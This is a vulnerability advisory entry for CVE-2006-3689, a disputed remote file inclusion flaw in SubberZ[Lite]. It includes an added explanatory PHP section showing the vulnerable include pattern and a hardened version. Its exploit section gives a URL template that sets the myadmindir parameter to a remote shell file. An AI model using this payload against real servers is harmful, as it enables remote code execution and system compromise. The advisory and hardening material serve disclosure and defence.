Subberz Lite UserFunc 'user-func.php' PHP Remote File Include Vulnerability

Vulnerability ID: 1110608
Vulnerability type: Input validation
Published: 2006-07-14
Updated: 2006-08-02
CVE: CVE-2006-3689
CNNVD ID: CNNVD-200607-316
Platform: PHP
CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/28223
https://cxsecurity.com/issue/WLB-2006070083
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-316
|Vulnerability details
**Disputed** user-func.php in Codeworks Gnomedia SubberZ[Lite] contains a PHP remote file inclusion vulnerability: a remote attacker can execute arbitrary PHP code via a URL supplied in the myadmindir parameter. Note: a third party disputes this issue, stating that "the myadmindir variable is set before any GET variables are processed."
|Exploit
source: http://www.securityfocus.com/bid/18990/info

SubberZ[Lite] is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

http://www.example.com[site]/[path]/user-func.php?myadmindir=[Shell]
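The bug class described above, as an added illustration that is not the page's own exploit and not SubberZ[Lite]'s real source (which the page does not show): a hypothetical reconstruction of an include whose path is built from a request-controlled variable such as myadmindir, placed beside a hardened version that fixes the directory at a constant, maps any user choice through an allow-list and checks the resolved path. The file names `admin-func.php`, the constant `SUBBERZ_ADMIN_DIR`, the `module` parameter and the allow-list contents are all assumptions made for the example.

```php
<?php
// Added example, hypothetical: the real user-func.php is not on this page.

// --- Vulnerable pattern (assumed reconstruction) ---
// Under register_globals=On (the PHP 4 era default) a request parameter
// ?myadmindir=... already populates $myadmindir before this line runs, and
// with allow_url_fopen/allow_url_include enabled include() will fetch and
// execute whatever that URL returns. Whether SubberZ[Lite] assigns the
// variable earlier, as the disputing party claims, is exactly the point
// under dispute on this page; the pattern itself is the hazard.
function vulnerable_include(): void
{
    global $myadmindir;                        // may come straight from the request
    include($myadmindir . '/admin-func.php');  // hypothetical file name
}

// --- Hardened pattern ---
// 1. The include directory is a constant relative to the script, never request data.
// 2. Any user-selectable module name is checked against an allow-list.
// 3. The resolved path is confirmed to sit inside the intended directory.
// In php.ini, additionally set register_globals = Off (removed in PHP 5.4)
// and allow_url_include = Off so a URL can never reach include() at all.
define('SUBBERZ_ADMIN_DIR', __DIR__ . '/admin');   // hypothetical constant

function safe_include(string $requested): void
{
    // constructed allow-list of the module names the application supports
    $allowed = ['admin-func', 'user-func'];
    if (!in_array($requested, $allowed, true)) {
        http_response_code(400);
        exit('invalid module');
    }

    $base = realpath(SUBBERZ_ADMIN_DIR);
    $path = realpath(SUBBERZ_ADMIN_DIR . '/' . $requested . '.php');

    // realpath() returns false for missing files and resolves ../ and symlinks,
    // so the prefix check rejects anything that escaped the admin directory.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(400);
        exit('invalid module');
    }

    include $path;
}

// Only the hardened function is ever wired to request input.
safe_include($_GET['module'] ?? 'user-func');
```

The allow-list check alone would already block a URL in `module`; the `realpath()` prefix check is the defence-in-depth step that also stops local traversal if the allow-list is later loosened, and the two php.ini settings remove the remote-include capability from the interpreter regardless of what application code does.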
|References

Source: XF
Name: subberzlite-userfunc-file-include (27748)
Link: http://xforce.iss.net/xforce/xfdb/27748
Source: BID
Name: 18990
Link: http://www.securityfocus.com/bid/18990
Source: BUGTRAQ
Name: 20060717 Re: SubberZ[Lite] - Remote File Include
Link: http://www.securityfocus.com/archive/1/archive/1/440864/100/100/threaded
Source: BUGTRAQ
Name: 20060714 SubberZ[Lite] - Remote File Include
Link: http://www.securityfocus.com/archive/1/archive/1/440139/100/0/threaded
Source: OSVDB
Name: 28592
Link: http://www.osvdb.org/28592
Source: SREASON
Name: 1246
Link: http://securityreason.com/securityalert/1246